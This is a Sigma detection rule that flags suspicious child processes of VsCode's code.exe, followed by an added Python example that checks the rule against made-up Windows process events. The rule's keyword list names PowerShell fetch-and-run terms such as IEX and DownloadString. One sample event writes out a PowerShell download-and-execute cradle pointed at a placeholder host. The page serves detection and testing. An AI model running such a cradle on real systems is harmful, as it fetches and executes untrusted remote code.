Potentially Suspicious Child Process Of VsCode
Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt at persistence via VsCode tasks or terminal profiles.
Sigma rule
```yaml
title: Potentially Suspicious Child Process Of VsCode
id: 5a3164f2-b373-4152-93cf-090b13c12d27
status: test
description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt at persistence via VsCode tasks or terminal profiles.
references:
    - https://twitter.com/nas_bench/status/1618021838407495681
    - https://twitter.com/nas_bench/status/1618021415852335105
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-26
modified: 2023-10-25
tags:
    - attack.execution
    - attack.defense-evasion
    - attack.t1218
    - attack.t1202
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\code.exe'
    selection_children_images:
        Image|endswith:
            - '\calc.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
            - '\cscript.exe'
            - '\wscript.exe'
    selection_children_cli:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'Invoke-Expressions'
            - 'IEX'
            - 'Invoke-Command'
            - 'ICM'
            - 'DownloadString'
            - 'rundll32'
            - 'regsvr32'
            - 'wscript'
            - 'cscript'
    selection_children_paths:
        Image|contains:
            # Add more suspicious locations
            - ':\Users\Public\'
            - ':\Windows\Temp\'
            - ':\Temp\'
    condition: selection_parent and 1 of selection_children_*
falsepositives:
    - In development environments where VsCode is used heavily. False positives may occur when developers use tasks to compile or execute different types of code. Remove or add processes accordingly.
level: medium
```
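To make the rule's logic concrete, the following is an added example (not code from the Sigma project or the rule author) that evaluates the three child selections and the `selection_parent and 1 of selection_children_*` condition in plain Python over constructed process_creation events. Field names follow Sigma's process_creation taxonomy (`ParentImage`, `Image`, `CommandLine`); the event ids, paths and command lines are made up, and the placeholder host `example.invalid` is not a real indicator. It also shows why the false-positive note matters: a developer task that merely mentions `wscript` on a `cmd.exe` command line fires the rule.

```python
# Added example: evaluate the VsCode child-process Sigma rule against
# constructed Windows process_creation events. Not part of Sigma or the rule.

# Sigma's endswith/contains modifiers match case-insensitively by default,
# so both sides are lowercased before comparison.
def _ci_endswith(value, needles):
    v = (value or "").lower()
    return any(v.endswith(n.lower()) for n in needles)


def _ci_contains(value, needles):
    v = (value or "").lower()
    return any(n.lower() in v for n in needles)


def selection_parent(ev):
    return _ci_endswith(ev.get("ParentImage"), ["\\code.exe"])


def selection_children_images(ev):
    return _ci_endswith(ev.get("Image"), [
        "\\calc.exe", "\\regsvr32.exe", "\\rundll32.exe",
        "\\cscript.exe", "\\wscript.exe",
    ])


def selection_children_cli(ev):
    # Two fields inside one Sigma selection are ANDed together.
    return _ci_endswith(ev.get("Image"), [
        "\\powershell.exe", "\\pwsh.exe", "\\cmd.exe",
    ]) and _ci_contains(ev.get("CommandLine"), [
        "Invoke-Expressions", "IEX", "Invoke-Command", "ICM",
        "DownloadString", "rundll32", "regsvr32", "wscript", "cscript",
    ])


def selection_children_paths(ev):
    return _ci_contains(ev.get("Image"), [
        ":\\Users\\Public\\", ":\\Windows\\Temp\\", ":\\Temp\\",
    ])


CHILD_SELECTIONS = (
    selection_children_images,
    selection_children_cli,
    selection_children_paths,
)


def matches(ev):
    """condition: selection_parent and 1 of selection_children_*"""
    return selection_parent(ev) and any(sel(ev) for sel in CHILD_SELECTIONS)


# Constructed sample events (ids, paths and command lines are made up).
VSCODE = r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe"
SAMPLE_EVENTS = [
    # 1: PowerShell child using IEX + DownloadString -> selection_children_cli
    {"id": 1, "ParentImage": VSCODE,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/x')\""},
    # 2: ordinary build task, cmd.exe with no listed keyword -> no match
    {"id": 2, "ParentImage": VSCODE, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c npm run build"},
    # 3: rundll32 child -> selection_children_images
    {"id": 3, "ParentImage": VSCODE, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe example.dll,Start"},
    # 4: same suspicious command line but parent is not code.exe -> no match
    {"id": 4, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c \"IEX 'x'\""},
    # 5: child launched from a world-writable path -> selection_children_paths
    {"id": 5, "ParentImage": VSCODE, "Image": r"C:\Users\Public\helper.exe",
     "CommandLine": "helper.exe --init"},
    # 6: developer task that runs wscript via cmd.exe -> matches (likely false positive)
    {"id": 6, "ParentImage": VSCODE, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c wscript build.js"},
]


def alerting_event_ids(events=SAMPLE_EVENTS):
    """Return the ids of events the rule would alert on, in input order."""
    return [ev["id"] for ev in events if matches(ev)]


if __name__ == "__main__":
    print("alerting events:", alerting_event_ids())  # [1, 3, 5, 6]
```

Event 6 is the case the `falsepositives` entry describes: the `CommandLine|contains` list is substring-based and case-insensitive, so a legitimate task that invokes `wscript` or `cscript` through `cmd.exe` looks identical to the rule as an abuse of those hosts. Tuning for a heavy-VsCode environment means adding a filter selection for known task command lines rather than dropping the keyword.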
Related rules
- Potential Arbitrary File Download Via Cmdl32.EXE
- Potential Binary Impersonating Sysinternals Tools
- Suspicious Child Process Of BgInfo.EXE
- Suspicious ZipExec Execution
- Uncommon Child Process Of BgInfo.EXE